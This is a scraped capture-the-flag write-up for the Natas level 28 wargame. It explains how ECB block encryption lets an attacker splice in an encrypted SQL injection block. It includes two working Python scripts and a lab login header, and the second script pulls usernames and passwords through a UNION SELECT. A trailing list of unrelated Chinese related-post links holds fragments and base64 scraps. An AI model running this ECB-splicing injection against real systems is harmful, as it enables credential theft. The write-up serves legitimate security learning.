From:http://alkalinesecurity.com/blog/ctf-writeups/natas-28-getting-it-wrong/

Now that I knew it was ECB I decided to use a chosen plaintext attack, which would allow me to decrypt the portion of the ciphertext after the part that corresponded to the bytes of my query. I found another nice framework to carry this out, chosen-plaintext by EiNSeiN. Using this I produced the following code:

 import requests
 from urllib import quote, unquote
 from chosen_plaintext import ChosenPlaintext

 class Client(ChosenPlaintext):

     def __init__(self):
         ChosenPlaintext.__init__(self)
         #self.block_size = 16
         #self.plaintext_offset = 32

         return

     def ciphertext(self, plaintext):

         print "[*] Trying plaintext: %s" % plaintext.encode("hex")
         headers = {"Authorization": "Basic bmF0YXMyODpKV3dSNDM4d2tnVHNOS0JiY0pvb3d5eXNkTTgyWWplRg=="}
         resp = requests.post("http://natas28.natas.labs.overthewire.org/index.php", data={"query": plaintext}, headers=headers)

         data = unquote(resp.url.split("query=")[1]).decode("base64")
         print "[*] Got ciphertext: %s" % unquote(resp.url.split("query=")[1]).decode("base64").encode("hex")

         return data

 c = Client()
 c.run()
 print 'recovered', repr(c.plaintext)

But this code also failed after it found a single byte of plaintext: “%”! So again I thought the code must be wrong. However eventually I remembered that some query characters were being escaped which breaks the ability to perform the chosen plaintext attack beyond an occurrence of one of those characters. So now I knew the next two parts of the plaintext were % and an escaped character. After thinking for a little about it I concluded that it was %’ because it was the end of a SQL LIKE clause, something like “… WHERE joke_body LIKE ‘%{escaped_query}%’ …”. This fit the behavior of the script and made sense with those characters. So now I knew that the ciphertext was an ECB Mode Block Cipher encrypted SQL query. Now since ECB simply encrypts each block separately I could encrypt a block containing valid SQL syntax and then insert it after the %’ in the ciphertext in order to achieve SQL injection. The code below accomplishes this and prints out the password.

 import requests
 from urllib import quote, unquote
 import re

 from pwn import *

 natas_url = "http://natas28.natas.labs.overthewire.org/index.php"
 search_url = "http://natas28.natas.labs.overthewire.org/search.php/?query="

 #authorization header
 headers = {"Authorization": "Basic bmF0YXMyODpKV3dSNDM4d2tnVHNOS0JiY0pvb3d5eXNkTTgyWWplRg=="}

 log.info("Retrieving first ciphertext")

 #pad plaintext to ensure it takes up a full ciphertext block
 plaintext = "A"*10 + "B"*14
 resp = requests.post(natas_url, data={"query": plaintext}, headers=headers)

 #get the raw bytes of the ciphertext
 encoded_ciphertext = resp.url.split("query=")[1]
 ciphertext = unquote(encoded_ciphertext).decode("base64")

 #sql to inject into ciphertext query
 new_sql = " UNION ALL SELECT concat(username,0x3A,password) FROM users #"
 log.info("Appending query: %s" % new_sql)

 #pad plaintext to ensure it also takes up a whole number of ciphertext blocks
 plaintext = "A"*10 + new_sql + "B"*(16-(len(new_sql)%16))
 offset = 48 + len(plaintext)-10

 resp = requests.post(natas_url, data={"query": plaintext}, headers=headers)
 encoded_new_ciphertext = resp.url.split("query=")[1]
 new_ciphertext = unquote(encoded_new_ciphertext).decode("base64")
 encrypted_sql = new_ciphertext[48:offset]

 #add the encrypted new sql into the final ciphertext
 final_ciphertext = ciphertext[:64]+encrypted_sql+ciphertext[64:]

 resp = requests.get(search_url, params={"query":final_ciphertext.encode("base64")}, headers=headers)

 log.info("Response: %s" % re.findall("<li>(.*?)</li>", resp.content)[0])

This was a surprising and interesting challenge. It nicely demonstrates the weakness of ECB block ciphers when the attacker is able to partially control plaintext. It also demonstrated to me that I should never be so sure of my initial assessment that I am blinded when new evidence appears.

reference:

https://dev.mysql.com/doc/refman/5.7/en/string-functions.html#function_concat

转:Natas Wargame Level28 Writeup(EBC加密破解)的更多相关文章

  1. Natas Wargame Level20 Writeup(会话状态注入/篡改)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAArMAAACmCAYAAADJYwcaAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  2. Natas Wargame Level27 Writeup(SQL表的注入/溢出与截取)

    前端: <html> <head> <!-- This stuff in the header has nothing to do with the level --&g ...

  3. Natas Wargame Level25 Writeup(头部注入+POST/GET注入)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAArsAAAC8CAYAAAB4+WYTAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  4. Natas Wargame Level26 Writeup(PHP对象注入)

    源码: <?php // sry, this is ugly as hell. // cheers kaliman ;) // - morla class Logger{ private $lo ...

  5. 齐博软件(地方门户系统) 文件加密破解工具

    原文:齐博软件(地方门户系统) 文件加密破解工具 本程序为针对"齐博软件地方门户系统5.0官方原版"的破解工具,一个垃圾系统居然弄出这么恶心的加密方式,有个鸟用!以后见一个破一个! ...

  6. Zip伪加密 破解ZIP密码

    ZIP是一种相当简单的分别压缩每个文件的存档格式.分别压缩文件允许不必读取另外的数据而检索独立的文件:理论上,这种格式允许对不同的文件使用不同的算法.不管用何种方法,对这种格式的一个告诫是对于包含很多 ...

  7. GPP加密破解工具gpp-decrypt

    GPP加密破解工具gpp-decrypt   GPP是Group Policy Preferences(组策略首选项)的缩写,这是一个组策略实施工具.通过该工具,网络管理员可以实现更多的网络管理,如驱 ...

  8. python爬虫-有道翻译-js加密破解

    有道翻译-js加密破解 这是本地爬取的网址:http://fanyi.youdao.com/ 一.分析请求 我们在页面中输入:水果,翻译后的英文就是:fruit.请求携带的参数有很多,先将参数数据保存 ...

  9. 密码学笔记——eval(function(p,a,c,k,e,d) 加密破解

    密码学笔记——eval(function(p,a,c,k,e,d) 的加密破解 例题: 小明某天在看js的时候,突然看到了这么一段代码,发现怎么也理不出代码逻辑,你能帮帮他吗? 格式:SimCTF{} ...

随机推荐

  1. JAVA的继承,构造函数,窗体

    import java.awt.*; import javax.swing.*; import javax.swing.JFrame; import java.awt.event.WindowList ...

  2. [转载] 常用 Java 静态代码分析工具的分析与比较

    转载自http://www.oschina.net/question/129540_23043 简介: 本文首先介绍了静态代码分析的基本概念及主要技术,随后分别介绍了现有 4 种主流 Java 静态代 ...

  3. [转载] Hibernate与 MyBatis的比较

    转载自http://blog.csdn.net/firejuly/article/details/8190229 最近做了一个Hibernate与MyBatis的对比总结,希望大家指出不对之处. 第一 ...

  4. 源码怎么找之rest_framework的用户认证

    首先得有一点常识,比如用户认证,就是authenticate 比如一个函数,应该有返回值, 比如一个类里面的self,真的是代表本身这个类吗 再比如看到一个东西加括号,就两种情况,一种是函数,一种是类 ...

  5. 【YFMemoryLeakDetector】人人都能理解的 iOS 内存泄露检测工具类

    背景 即使到今天,iOS 应用的内存泄露检测,仍然是一个很重要的主题.我在一年前,项目中随手写过一个简单的工具类,当时的确解决了大问题.视图和控制器相关的内存泄露,几乎都不存在了.后来想着一直就那个工 ...

  6. insert时报Cannot add or update a child row: a foreign key constraint fails (`yanchangzichan`.`productstatusrecord`, CONSTRAINT `p_cu` FOREIGN KEY (`cid`) REFERENCES `customer` (`cid`))错误

    mybatis在insert时报Cannot add or update a child row: a foreign key constraint fails (`yanchangzichan`.` ...

  7. 为什么我的子线程更新了 UI 没报错?借此,纠正一些Android 程序员的一个知识误区

    开门见山: 这个误区是:子线程不能更新 UI ,其应该分类讨论,而不是绝对的. 半小时前,我的 XRecyclerView 群里面,一位群友私聊我,问题是: 为什么我的子线程更新了 UI 没报错? 我 ...

  8. git学习之创建版本库

    创建版本库 什么是版本库呢?版本库又名仓库,英文名repository,你可以简单理解成一个目录,这个目录里面的所有文件都可以被Git管理起来,每个文件的修改.删除,Git都能跟踪,以便任何时刻都可以 ...

  9. laravel中with()方法,has()方法和whereHas()方法的区别

    with() with()方法是用作"渴求式加载"的,那主要意味着,laravel将会伴随着主要模型预加载出确切的的关联关系.这就对那些如果你想加在一个模型的所有关联关系非常有帮助 ...

  10. IPv6 VS IPv4,谈谈升级 IPv6 的必要性

    11月26日,中办.国办印发了<推进互联网协议第六版(IPv6)规模部署行动计划>,提出国内要在 5~10 年的时间形成下一代互联网自主技术体系和产业生态,建成全球最大规模的 IPv6 商 ...